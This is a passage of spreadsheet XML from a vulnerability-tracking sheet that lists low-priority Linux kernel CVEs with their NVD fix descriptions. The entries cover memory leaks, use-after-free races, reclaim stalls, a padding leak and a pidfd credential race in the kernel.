      <c r="H1068" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr"/>
      <c r="L1068" s="5" t="inlineStr"/>
      <c r="M1068" s="5" t="inlineStr"/>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1068" s="5" t="inlineStr"/>
      <c r="Q1068" s="5" t="inlineStr"/>
      <c r="R1068" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: midi2: remove default configfs groups on teardown
f_midi2_alloc_inst() creates default configfs child groups for the
default endpoint and default block using configfs_add_default_group(),
setting their internal refcount to 1.
However, during function teardown in f_midi2_free_inst() or EP cleanup
in f_midi2_ep_opts_release(), configfs_remove_default_groups() is
never called, therefore never dropping the refcount and leaking struct
f_midi2_ep_opts and f_midi2_block_opts.
Add the missing configfs_remove_default_groups() in the afformentioned
functions to free the structs properly.</t>
        </is>
      </c>
      <c r="S1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89735</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89737</t>
        </is>
      </c>
      <c r="D1069" s="5" t="inlineStr"/>
      <c r="E1069" s="5" t="inlineStr"/>
      <c r="F1069" s="5" t="inlineStr"/>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr"/>
      <c r="L1069" s="5" t="inlineStr"/>
      <c r="M1069" s="5" t="inlineStr"/>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1069" s="5" t="inlineStr"/>
      <c r="Q1069" s="5" t="inlineStr"/>
      <c r="R1069" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: thunderbolt: Disable work before freeing tbt on remove
tbt_altmode_remove() drops the plug and cable references without
draining tbt-&gt;work. The work function dereferences those references,
and can also requeue itself in its error path. The VDM callbacks can
queue the same work item.
Disable and drain tbt-&gt;work before dropping the references. This waits
for an existing invocation and prevents subsequent schedule_work()
calls from queueing it during teardown.
This issue was found by an in-house static analysis tool and confirmed
by manual code review.</t>
        </is>
      </c>
      <c r="S1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89737</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89739</t>
        </is>
      </c>
      <c r="D1070" s="5" t="inlineStr"/>
      <c r="E1070" s="5" t="inlineStr"/>
      <c r="F1070" s="5" t="inlineStr"/>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr"/>
      <c r="L1070" s="5" t="inlineStr"/>
      <c r="M1070" s="5" t="inlineStr"/>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1070" s="5" t="inlineStr"/>
      <c r="Q1070" s="5" t="inlineStr"/>
      <c r="R1070" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: dwc3: gadget: Fix use-after-free in dwc3_gadget_free_endpoints due to race condition
In dwc3_gadget_init_endpoint, &amp;dep-&gt;nostream_work is bound with
dwc3_nostream_work, and dwc3_gadget_endpoint_stream_event can queue
this delayed work on system_percpu_wq when a DEPEVT_STREAM_NOSTREAM
event is received.
If we remove the gadget, dwc3_gadget_free_endpoints makes cleanup and
the memory allocated for dep with kzalloc() is released by kfree(dep),
while the delayed work mentioned above may still be pending or
running. The sequence of operations that may lead to a UAF bug is as
follows:
CPU0                                      CPU1
                                          | dwc3_thread_interrupt
                                          | dwc3_endpoint_interrupt
                                          | dwc3_gadget_endpoint_stream_event
                                          | queue_delayed_work(system_percpu_wq,
                                          |                    &amp;dep-&gt;nostream_work)
dwc3_gadget_free_endpoints                |
dwc3_free_trb_pool(dep)                   |
list_del(&amp;dep-&gt;endpoint.ep_list)          |
dwc3_debugfs_remove_endpoint_dir(dep)     |
kfree(dep)                                |
// dep is freed                           |
                                          | dwc3_nostream_work
                                          | // use dep (use-after-free)
Fix it by canceling the delayed work before kfree(dep) in
dwc3_gadget_free_endpoints.</t>
        </is>
      </c>
      <c r="S1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89739</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89740</t>
        </is>
      </c>
      <c r="D1071" s="5" t="inlineStr"/>
      <c r="E1071" s="5" t="inlineStr"/>
      <c r="F1071" s="5" t="inlineStr"/>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr"/>
      <c r="M1071" s="5" t="inlineStr"/>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1071" s="5" t="inlineStr"/>
      <c r="Q1071" s="5" t="inlineStr"/>
      <c r="R1071" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: imx: serialize imx_uart_ports[] lifetime
imx_uart_probe() publishes its devm-allocated port in imx_uart_ports[]
before uart_add_one_port() because console setup uses the table. The entry
is not cleared when adding the port fails or after removal, leaving a
dangling pointer.
A sibling probe can register the shared console through that stale entry.
This was reproduced under KASAN on QEMU mcimx6ul-evk by unbinding a
sibling UART, unbinding the console UART and rebinding the sibling.
Keep the entry valid through uart_remove_one_port(), then clear it. Protect
port addition and removal together with their table updates so sibling
operations cannot interleave. Reject an occupied slot rather than
clobbering an active port during a duplicate-line probe.</t>
        </is>
      </c>
      <c r="S1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89740</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89745</t>
        </is>
      </c>
      <c r="D1072" s="5" t="inlineStr"/>
      <c r="E1072" s="5" t="inlineStr"/>
      <c r="F1072" s="5" t="inlineStr"/>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr"/>
      <c r="L1072" s="5" t="inlineStr"/>
      <c r="M1072" s="5" t="inlineStr"/>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1072" s="5" t="inlineStr"/>
      <c r="Q1072" s="5" t="inlineStr"/>
      <c r="R1072" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
debugfs: Fix lockdown check for mmap_prepare
Commit 651fdda8406d ("relay: update relay to use mmap_prepare")
changed the `mmap` file operation to `mmap_prepare` for relayfs, but
the lockdown check in debugfs was not updated accordingly.
This prevents debugfs from being locked down when the kernel is in
integrity mode if a file uses `mmap_prepare` but not `mmap`.
Since the conversion to `mmap_prepare` across the kernel is not yet
complete, update the lockdown check to look for both `mmap` and
`mmap_prepare` to ensure comprehensive coverage.</t>
        </is>
      </c>
      <c r="S1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89745</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89749</t>
        </is>
      </c>
      <c r="D1073" s="5" t="inlineStr"/>
      <c r="E1073" s="5" t="inlineStr"/>
      <c r="F1073" s="5" t="inlineStr"/>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr"/>
      <c r="M1073" s="5" t="inlineStr"/>
      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1073" s="5" t="inlineStr"/>
      <c r="Q1073" s="5" t="inlineStr"/>
      <c r="R1073" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix crash passing ERR_PTR to kthread_stop()
event_test_stuff() calls kthread_run() and unconditionally passes the
returned task_struct pointer to kthread_stop(). kthread_run() returns an
error pointer such as ERR_PTR(-ENOMEM) when kthread creation fails, for
example under memory pressure during the boot-time event self-test.
kthread_stop() then dereferences the invalid pointer, crashing the kernel.
Check the result of kthread_run() before passing it to kthread_stop(). Use
WARN_ON() so that a failure to create the self-test thread does not go
unnoticed, matching the ring-buffer self-test fix in commit
91542863abad ("ring-buffer: Fix crash passing ERR_PTR to kthread_stop()").</t>
        </is>
      </c>
      <c r="S1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89749</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89751</t>
        </is>
      </c>
      <c r="D1074" s="5" t="inlineStr"/>
      <c r="E1074" s="5" t="inlineStr"/>
      <c r="F1074" s="5" t="inlineStr"/>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr"/>
      <c r="L1074" s="5" t="inlineStr"/>
      <c r="M1074" s="5" t="inlineStr"/>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1074" s="5" t="inlineStr"/>
      <c r="Q1074" s="5" t="inlineStr"/>
      <c r="R1074" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/tdx: Fix off-by-one in port I/O handling
handle_in() and handle_out() in arch/x86/coco/tdx/tdx.c use:
    u64 mask = GENMASK(BITS_PER_BYTE * size, 0);
GENMASK(h, l) includes bit h. For size=1 (INB), this produces
GENMASK(8, 0) = 0x1FF (9 bits) instead of GENMASK(7, 0) = 0xFF (8
bits). The mask is one bit too wide for all I/O sizes.
Fix the mask calculation.</t>
        </is>
      </c>
      <c r="S1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89751</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89752</t>
        </is>
      </c>
      <c r="D1075" s="5" t="inlineStr"/>
      <c r="E1075" s="5" t="inlineStr"/>
      <c r="F1075" s="5" t="inlineStr"/>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr"/>
      <c r="L1075" s="5" t="inlineStr"/>
      <c r="M1075" s="5" t="inlineStr"/>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1075" s="5" t="inlineStr"/>
      <c r="Q1075" s="5" t="inlineStr"/>
      <c r="R1075" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm: memcg: stop reclaim when a limit update is superseded
kernfs serializes file operations only per open file, so separate open
files can update the same memory.high or memory.max file concurrently. 
Both handlers store the new limit before synchronous reclaim, but continue
to use the writer's local target in the reclaim loop.  If another writer
raises or removes the limit, the first writer can continue reclaiming
toward a stale target.
For memory.max, this can leave the writer looping indefinitely once
reclaim retries are exhausted.  The OOM path sees sufficient margin under
the current limit and returns true without killing, while the writer still
compares usage against its stale target and records another OOM event.
Check the current limit at the start of each reclaim iteration and stop if
it no longer matches the writer's target.
Reproducer:
Populate a cgroup with anonymous memory and disable swapping.  Lower
memory.max from one open file, then restore it to "max" through another
open file after the new limit becomes visible.
Without the patch, the first writer remains blocked and repeatedly
increments the OOM event counter.  With the patch, it returns normally.
This was not motivated by a reported production workload.  We found it
through automated randomized testing for our cgroup observability work
and reduced it to the reproducer above.</t>
        </is>
      </c>
      <c r="S1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89752</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89753</t>
        </is>
      </c>
      <c r="D1076" s="5" t="inlineStr"/>
      <c r="E1076" s="5" t="inlineStr"/>
      <c r="F1076" s="5" t="inlineStr"/>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr"/>
      <c r="L1076" s="5" t="inlineStr"/>
      <c r="M1076" s="5" t="inlineStr"/>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1076" s="5" t="inlineStr"/>
      <c r="Q1076" s="5" t="inlineStr"/>
      <c r="R1076" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/vmscan: report RCU-tasks quiescent states in shrink_lruvec()
I am seeing some rcu_tasks stalls in the Meta fleet during reclaim.
  INFO: rcu_tasks detected stalls on tasks:
	0000000088620d09: .. nvcsw: 6735/6735 holdout: 1 idle_cpu: -1/8
	task:GlobalCPUThread state:R  running task  pid:2552016 tgid:2524552
  Call Trace:
   shrink_lruvec
   mem_cgroup_iter
   shrink_node
   do_try_to_free_pages
   try_to_free_pages
   __alloc_frozen_pages_noprof
   alloc_pages_noprof
   pte_alloc_one
   __pte_alloc
   handle_mm_fault
Nothing promises direct reclaim returns in bounded time, and the scan loop
in shrink_lruvec() only calls cond_resched(), which is a no-op on
PREEMPTION kernels.  Involuntary preemption is not a Tasks-RCU quiescent
state, so the reclaiming task never reports one and becomes a holdout.
Upgrade it to cond_resched_tasks_rcu_qs(), which reports a quiescent state
even when cond_resched() does nothing.
PS: This has been discussed in [1]</t>
        </is>
      </c>
      <c r="S1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89753</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89756</t>
        </is>
      </c>
      <c r="D1077" s="5" t="inlineStr"/>
      <c r="E1077" s="5" t="inlineStr"/>
      <c r="F1077" s="5" t="inlineStr"/>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr"/>
      <c r="L1077" s="5" t="inlineStr"/>
      <c r="M1077" s="5" t="inlineStr"/>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr"/>
      <c r="Q1077" s="5" t="inlineStr"/>
      <c r="R1077" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/migrate: report RCU-tasks quiescent states in migrate_pages_batch()
migrate_pages_batch() unmaps each folio before moving it, and every
unmap runs the mmu_notifier invalidate callbacks.  On KVM hosts
try_to_migrate() ends up in kvm_mmu_notifier_invalidate_range_start() -&gt;
tdp_mmu_zap_leafs(), which is expensive, so unmapping a large batch keeps
the CPU busy for a long time.
The loop already calls cond_resched(), but on PREEMPTION kernels that is
a no-op, and involuntary preemption is not a Tasks-RCU quiescent state.
A long batch therefore never reports a quiescent state, and the
migrating task (e.g. kcompactd) becomes a Tasks-RCU holdout, stalling the
Tasks-RCU grace period for minutes, which is common at Meta fleet:
  INFO: rcu_tasks detected stalls on tasks:
  0000000055349ecc: .. nvcsw: 1157401/1157401 holdout: 1 idle_cpu: -1/56 task:kcompactd0      state:R  running task
  Call Trace:
   tdp_mmu_zap_leafs
   tdp_mmu_next_root
   gfn_to_pfn_cache_invalidate_start
   kvm_mmu_notifier_invalidate_range_start
   __mmu_notifier_invalidate_range_start
   try_to_migrate_one
   try_to_migrate
   migrate_pages_batch
   migrate_pages
   compact_zone
   compact_node
   kcompactd
   kthread
Use cond_resched_tasks_rcu_qs() so a quiescent state is reported even
when cond_resched() does nothing.
This has also been discussed at [1]</t>
        </is>
      </c>
      <c r="S1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89756</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89757</t>
        </is>
      </c>
      <c r="D1078" s="5" t="inlineStr"/>
      <c r="E1078" s="5" t="inlineStr"/>
      <c r="F1078" s="5" t="inlineStr"/>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr"/>
      <c r="L1078" s="5" t="inlineStr"/>
      <c r="M1078" s="5" t="inlineStr"/>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1078" s="5" t="inlineStr"/>
      <c r="Q1078" s="5" t="inlineStr"/>
      <c r="R1078" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mglru: fix and remove redundant unevictable folio handling
sort_folio() has a shortcut for moving folios that are no longer evictable
but are still sitting on a generation list.  However, this shortcut is
buggy.  It does not follow the PG_lru usage convention, and it has a more
serious issue.
Unevictable folios are not threaded on lists[LRU_UNEVICTABLE], so that
folio-&gt;lru can be reused to hold folio-&gt;mlock_count (see the comment in
lruvec_init()).  Hence lruvec_add_folio() skips the list_add() for them,
and every other place that turns a folio unevictable initialises
mlock_count explicitly: lru_add() sets it to 0, __mlock_folio() and
__mlock_new_folio() set it to !!folio_test_mlocked(folio).  sort_folio()
sets nothing, and the lru_gen_del_folio() right above it may have already
poisoned folio-&gt;lru via list_del(), so mlock_count ends up aliasing
LIST_POISON2, which reads as 0x122, i.e.  290.  The result is user
visible.  On munlock, __munlock_folio() decrements that bogus count, finds
it still non-zero and bails out before clearing PG_mlocked, so the folio
remains unevictable and the Mlocked accounting stays inflated until the
folio is freed.
The shortcut also touches the LRU flags in the wrong order.  It calls
lru_gen_del_folio() while PG_lru is still set, so a concurrent
folio_test_clear_lru() (e.g.  compaction, folio_isolate_lru()) can succeed
on a folio that has already been taken off the generation list, which may
lead to unexpected behavior.
So fix it by isolating them as common folios and letting the generic
shrink path cull them.  This matches the classical LRU behavior, and there
should be no visible effect on the generic eviction or isolation behavior.
There is no performance concern either, such a folio goes through this
once, and then it is off the generation lists for good.</t>
        </is>
      </c>
      <c r="S1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89757</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89759</t>
        </is>
      </c>
      <c r="D1079" s="5" t="inlineStr"/>
      <c r="E1079" s="5" t="inlineStr"/>
      <c r="F1079" s="5" t="inlineStr"/>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr"/>
      <c r="L1079" s="5" t="inlineStr"/>
      <c r="M1079" s="5" t="inlineStr"/>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1079" s="5" t="inlineStr"/>
      <c r="Q1079" s="5" t="inlineStr"/>
      <c r="R1079" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/kmemleak: avoid soft lockup when scanning task stacks
Patch series "mm/kmemleak: avoid soft lockup when scanning task", v3.
kmemleak_scan() scans every task stack under one rcu_read_lock() with no
reschedule point, which can trip the soft lockup watchdog on hosts with
very many threads.
That prints the following message, depending on the workload+host
configuration:
      watchdog: BUG: soft lockup - CPU#35 stuck for 22s! [kmemleak:537]
       scan_block
       kmemleak_scan
       kmemleak_scan_thread
       kthread
Patch 1 walks the tasks with find_ge_pid() so the scan reschedules between
tasks
Patches 2-3 let the scan loops stop early once a scan is interrupted.
This patch (of 3):
kmemleak_scan() walks every thread and scans its kernel stack under a
single rcu_read_lock() with no reschedule point.  On a host with very many
threads -- amplified by KASAN/lockdep in debug builds -- this loop can hog
a CPU long enough to trip the soft lockup watchdog:
  watchdog: BUG: soft lockup - CPU#35 stuck for 22s! [kmemleak:537]
   scan_block
   kmemleak_scan
   kmemleak_scan_thread
   kthread
A cond_resched() cannot be added directly: the loop runs inside an RCU
read-side critical section.
Walk the tasks one PID at a time with find_ge_pid(), taking the RCU read
lock only to look up and pin each task.  The stack is then scanned with no
lock held, so cond_resched() runs between tasks and the scan stops early
on scan_should_stop().  This follows the next_tgid()/task_seq_get_next()
iteration pattern and keeps each RCU critical section short.</t>
        </is>
      </c>
      <c r="S1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89759</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89765</t>
        </is>
      </c>
      <c r="D1080" s="5" t="inlineStr"/>
      <c r="E1080" s="5" t="inlineStr"/>
      <c r="F1080" s="5" t="inlineStr"/>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr"/>
      <c r="L1080" s="5" t="inlineStr"/>
      <c r="M1080" s="5" t="inlineStr"/>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1080" s="5" t="inlineStr"/>
      <c r="Q1080" s="5" t="inlineStr"/>
      <c r="R1080" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
timers/itimer: Zero-init old itimerval before copy to userspace
On native sparc64, struct __kernel_old_timeval contains a four-byte hole
after tv_usec because tv_sec is 64-bit while __kernel_suseconds_t is 32-bit.
put_itimerval() fills only the named fields in a stack-allocated
__kernel_old_itimerval and copies the entire object to userspace, so
getitimer() can expose the two padding holes.
Zero-initialize the aggregate before assigning the fields so implicit
padding is deterministic before it crosses the user/kernel boundary.</t>
        </is>
      </c>
      <c r="S1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89765</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89766</t>
        </is>
      </c>
      <c r="D1081" s="5" t="inlineStr"/>
      <c r="E1081" s="5" t="inlineStr"/>
      <c r="F1081" s="5" t="inlineStr"/>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1081" s="5" t="inlineStr"/>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr"/>
      <c r="L1081" s="5" t="inlineStr"/>
      <c r="M1081" s="5" t="inlineStr"/>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr"/>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pidfd: hold exec_update_lock around namespace ioctl
The PIDFD_GET_*_NAMESPACE ioctls in pidfd_ioctl() perform a filesystem
credentials ptrace access check before handing out a namespace file
descriptor.  The accompanying comment states that the code "mirrors nsfs
behavior", but, unlike the corresponding procfs paths, it does so without
holding the target task's exec_update_lock.
proc_ns_get_link() and proc_ns_readlink() both take exec_update_lock for
reading around the ptrace check and the namespace lookup, so that the
credentials used for the access decision match those of the task when its
namespace is read.  Without it, a caller can pass the check against the
target's old credentials and then read the namespace after the target has
execve()'d a setuid binary and committed new credentials -- accessing
namespace information it should have been denied.
Hold exec_update_lock for reading around the ptrace check and the
namespace lookup so that pidfd truly mirrors nsfs behavior, as the comment
already claims.  open_namespace() itself runs outside the lock: once a
namespace reference is obtained it carries its own refcount and is opened
with the caller's own credentials, so a concurrent execve() on the target
can no longer affect the outcome.</t>
        </is>
      </c>
